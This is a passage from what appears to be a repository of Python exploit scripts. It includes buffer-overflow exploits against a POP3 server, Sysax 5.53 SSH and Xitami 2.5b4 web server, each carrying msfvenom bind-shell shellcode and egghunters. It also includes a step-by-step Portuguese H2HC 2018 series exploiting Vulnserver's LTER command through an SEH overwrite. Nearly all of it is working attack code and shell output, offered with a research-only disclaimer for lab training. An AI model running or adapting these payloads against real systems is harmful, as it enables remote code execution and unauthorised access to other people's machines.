| "\xf4\x89\x89\xcb\xa4\x25\x62\xac\x14\x86\xd2\x44\x7e\x09\x0c" 58 | "\x74\x81\xc3\x25\x1f\x78\x84\x43\xea\x82\x40\x3c\xe8\x82\x69" 59 | "\x07\x65\x64\x03\x67\x20\x3f\xbc\x1e\x69\xcb\x5d\xde\xa7\xb6" 60 | "\x5e\x54\x44\x47\x10\x9d\x21\x5b\xc5\x6d\x7c\x01\x40\x71\xaa" 61 | "\x2d\x0e\xe0\x31\xad\x59\x19\xee\xfa\x0e\xef\xe7\x6e\xa3\x56" 62 | "\x5e\x8c\x3e\x0e\x99\x14\xe5\xf3\x24\x95\x68\x4f\x03\x85\xb4" 63 | "\x50\x0f\xf1\x68\x07\xd9\xaf\xce\xf1\xab\x19\x99\xae\x65\xcd" 64 | "\x5c\x9d\xb5\x8b\x60\xc8\x43\x73\xd0\xa5\x15\x8c\xdd\x21\x92" 65 | "\xf5\x03\xd2\x5d\x2c\x80\xe2\x17\x6c\xa1\x6a\xfe\xe5\xf3\xf6" 66 | "\x01\xd0\x30\x0f\x82\xd0\xc8\xf4\x9a\x91\xcd\xb1\x1c\x4a\xbc" 67 | "\xaa\xc8\x6c\x13\xca\xd8") 68 | 69 | buffer = "A"*2606 + jmpESP + nop + shellcode + "C"*(3500-2606-4-351-16) 70 | 71 | try: 72 | print "\nSending evil buffer..." 73 | s.connect(('10.10.0.21',110)) 74 | data = s.recv(1024) 75 | s.send('USER username' +'\r\n') 76 | data = s.recv(1024) 77 | s.send('PASS ' + buffer + '\r\n') 78 | print "\nDone!." 79 | except: 80 | print "Could not connect to POP3!" 81 | -------------------------------------------------------------------------------- /exploit-sysax.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # October 2017 | github.com/rafaveira3 4 | # 5 | # Exploit Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated (Using Egghunter) 6 | # 7 | # How I tested it: 8 | # - Windows XP SP3 and Kali. 9 | # - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - https://www.exploit-db.com/apps/bac43012f5bd4d3092c1153b52ed3301-sysaxserv_setup5.53.msi 11 | # 12 | # PoC: 13 | # Windows XP: 14 | # - Install Sysax 5.53 (next -> next -> finish) 15 | # - Setup SSH service: "Manage Server Settings -> Configure -> Check first box" 16 | # - Open cmd.exe and type : netstat -ano | find ":4444" 17 | # Kali: 18 | # root@kali:~# pip install paramiko 19 | # root@kali:~# nc -nv 10.10.0.20 4444 20 | # (UNKNOWN) [10.10.0.20] 4444 (?) open 21 | # Microsoft Windows XP [Version 5.1.2600] 22 | # (C) Copyright 1985-2001 Microsoft Corp. 23 | # 24 | # C:\WINDOWS\system32> 25 | # 26 | # 27 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 28 | # Accessing a computer system or network without authorization or explicit permission is illegal. 29 | # 30 | # Infos: 31 | # - pattern_create + pattern_offset = 9208 32 | # - pop pop ret found using mona at 0x5d9227fc of RPCNS4.dll (SafeSEH: False) 33 | # - jmp back 128 bytes = \xEB\x80 34 | # - egghunter generated with mona (egg r4f4) 35 | # - shellcode generated with msfvenom 36 | 37 | import paramiko,os,sys 38 | 39 | host = "10.10.0.20" 40 | port = 22 41 | 42 | # Size 32 Bytes 43 | # Egg = r4f4 44 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 45 | 46 | # msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed 47 | # Size = 718 bytes 48 | shellcode = "" 49 | shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 50 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 51 | shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 52 | shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 53 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f" 54 | shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75" 55 | shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e" 56 | shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b" 57 | shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55" 58 | shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42" 59 | shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59" 60 | shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32" 61 | shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52" 62 | shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31" 63 | shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53" 64 | shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54" 65 | shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b" 66 | shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70" 67 | shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51" 68 | shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38" 69 | shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52" 70 | shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b" 71 | shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66" 72 | shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a" 73 | shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c" 74 | shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33" 75 | shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36" 76 | shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66" 77 | shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63" 78 | shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38" 79 | shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73" 80 | shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70" 81 | shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49" 82 | shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52" 83 | shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36" 84 | shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77" 85 | shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a" 86 | shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78" 87 | shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43" 88 | shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31" 89 | shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53" 90 | shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71" 91 | shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69" 92 | shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51" 93 | shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35" 94 | shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36" 95 | shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42" 96 | shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f" 97 | shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39" 98 | shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30" 99 | shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31" 100 | shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f" 101 | shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b" 102 | shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53" 103 | shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39" 104 | shellcode += "\x45\x41\x41" 105 | 106 | buff = "A"*8972 + "\x90"*150 + egghunter + "\x90"*50 + "B"*2 + "\xEB\x80" + "\xFC\x27\x92\x5d" + "r4f4r4f4" + shellcode 107 | 108 | print "[+] Launching exploit..." 109 | 110 | try: 111 | transport = paramiko.Transport((host, port)) 112 | except: 113 | print "[X] Unable to connect to " + host + " on port " + str(port) 114 | sys.exit(1) 115 | 116 | transport = paramiko.Transport((host, port)) 117 | transport.connect(username = buff, password = "rafael") 118 | transport.close() 119 | 120 | print "[+] Done!" 121 | -------------------------------------------------------------------------------- /exploit-xitami.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # October 2017 | github.com/rafaveira3 4 | # 5 | # Exploit Xitami Web Server 2.5b4 - Remote Buffer Overflow (Using Egghunter) 6 | # 7 | # How I tested it: 8 | # - Windows XP SP3 and Kali. 9 | # - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - https://www.exploit-db.com/apps/c0c25ccb447057f180b1aad3110242d9-bw3225b4.exe 11 | # 12 | # PoC: 13 | # Windows XP: 14 | # - Double click Xitami 15 | # - Open cmd.exe and type : netstat -ano | find ":4444" 16 | # Kali: 17 | # root@kali:~# python exploit-xitami.py 18 | # root@kali:~# 19 | # root@kali:~# nc -nv 10.10.0.20 4444 20 | # (UNKNOWN) [10.10.0.20] 4444 (?) open 21 | # Microsoft Windows XP [Version 5.1.2600] 22 | # (C) Copyright 1985-2001 Microsoft Corp. 23 | # 24 | # C:\Xitami> 25 | # 26 | # 27 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 28 | # Accessing a computer system or network without authorization or explicit permission is illegal. 29 | # 30 | # Infos: 31 | # - pattern_create + pattern_offset = 72 32 | # - Return Address found at 0x71A91C8B (JMP ESP) | wshtcpip.dll 33 | # - short jmp 54 bytes back opcode: \xEB\xCA 34 | # - egghunter generated with mona (egg r4f4) 35 | # - shellcode generated with msfvenom 36 | 37 | 38 | import socket 39 | import os 40 | import sys 41 | 42 | # Size = 32 bytes 43 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 44 | 45 | # msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed 46 | # Size = 718 bytes 47 | shellcode = "" 48 | shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 49 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 50 | shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 51 | shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 52 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f" 53 | shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75" 54 | shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e" 55 | shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b" 56 | shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55" 57 | shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42" 58 | shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59" 59 | shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32" 60 | shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52" 61 | shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31" 62 | shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53" 63 | shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54" 64 | shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b" 65 | shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70" 66 | shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51" 67 | shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38" 68 | shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52" 69 | shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b" 70 | shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66" 71 | shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a" 72 | shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c" 73 | shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33" 74 | shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36" 75 | shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66" 76 | shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63" 77 | shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38" 78 | shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73" 79 | shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70" 80 | shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49" 81 | shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52" 82 | shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36" 83 | shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77" 84 | shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a" 85 | shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78" 86 | shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43" 87 | shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31" 88 | shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53" 89 | shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71" 90 | shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69" 91 | shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51" 92 | shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35" 93 | shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36" 94 | shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42" 95 | shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f" 96 | shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39" 97 | shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30" 98 | shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31" 99 | shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f" 100 | shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b" 101 | shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53" 102 | shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39" 103 | shellcode += "\x45\x41\x41" 104 | 105 | Stage1 = "A"*25 + egghunter + "A"*(72-25-32) + "\x8B\x1C\xA9\x71" + "\xEB\xCA" + "r4f4r4f4" + shellcode 106 | 107 | buffer = ( 108 | "GET / HTTP/1.1\r\n" 109 | "Host: 10.10.0.20\r\n" 110 | "If-Modified-Since: pwned, " + Stage1 + "\r\n\r\n") 111 | 112 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 113 | expl.connect(("10.10.0.20", 80)) 114 | expl.send(buffer) 115 | expl.close() 116 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | evil = "A"*4000 12 | data = "LTER /.:/" + evil 13 | 14 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | expl.connect(("10.0.0.35", 9999)) 16 | expl.send(data) 17 | expl.close 18 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 12 | 13 | evil = "A"*3000 + pattern 14 | data = "LTER /.:/" + evil 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("10.0.0.35", 9999)) 18 | expl.send(data) 19 | expl.close 20 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | # evil = lixo + nSEH + SEH + lixo 12 | evil = "A"*3495 + "B"*4 + "C"*4 + "D"*497 13 | data = "LTER /.:/" + evil 14 | 15 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | expl.connect(("10.0.0.35", 9999)) 17 | expl.send(data) 18 | expl.close 19 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | # POP POP RET encontrado em 6250120b (essfunc.dll) 12 | seh = "\x0B\x12\x50\x62" 13 | 14 | # evil = lixo + nSEH + SEH + lixo 15 | evil = "A"*3495 + "B"*4 + seh + "D"*497 16 | data = "LTER /.:/" + evil 17 | 18 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | expl.connect(("10.0.0.35", 9999)) 20 | expl.send(data) 21 | expl.close 22 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | # POP POP RET encontrado em 6250120b (essfunc.dll) 12 | seh = "\x0B\x12\x50\x62" 13 | 14 | badchars=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"+ 15 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"+ 16 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"+ 17 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"+ 18 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"+ 19 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"+ 20 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"+ 21 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"+ 22 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"+ 23 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"+ 24 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"+ 25 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"+ 26 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"+ 27 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"+ 28 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"+ 29 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 30 | 31 | # evil = lixo + nSEH + SEH + lixo 32 | evil = "A"*(3495-len(badchars)) + badchars + "B"*4 + seh + "D"*497 33 | data = "LTER /.:/" + evil 34 | 35 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | expl.connect(("10.0.0.35", 9999)) 37 | expl.send(data) 38 | expl.close 39 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-6.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | # POP POP RET encontrado em 6250120b (essfunc.dll) 12 | seh = "\x0B\x12\x50\x62" 13 | 14 | # Pulando 128 bytes (FF se transformará em 80) 15 | pulo = "\x4C\x4C\x77\xFF" 16 | 17 | # evil = lixo + nSEH + SEH + lixo 18 | evil = "A"*3495 + pulo + seh + "D"*497 19 | data = "LTER /.:/" + evil 20 | 21 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | expl.connect(("10.0.0.35", 9999)) 23 | expl.send(data) 24 | expl.close 25 | -------------------------------------------------------------------------------- /h2hc-LTER/exploit-LTER-7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # H2HC 2018 - Vulnserver.exe 4 | # Um guia, passo a passo, para explorar o comando LTER. 5 | # 6 | 7 | import socket 8 | import os 9 | import sys 10 | 11 | # POP POP RET encontrado em 6250120b (essfunc.dll) 12 | seh = "\x0B\x12\x50\x62" 13 | 14 | # Pulando 128 bytes (FF se transformará em 80) 15 | pulo = "\x4C\x4C\x77\xFF" 16 | 17 | # evil = lixo + nSEH + SEH + lixo 18 | evil = "A"*3495 + pulo + seh + "D"*497 19 | data = "LTER /.:/" + evil 20 | 21 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | expl.connect(("10.0.0.35", 9999)) 23 | expl.send(data) 24 | expl.close 25 | --------------------------------------------------------------------------------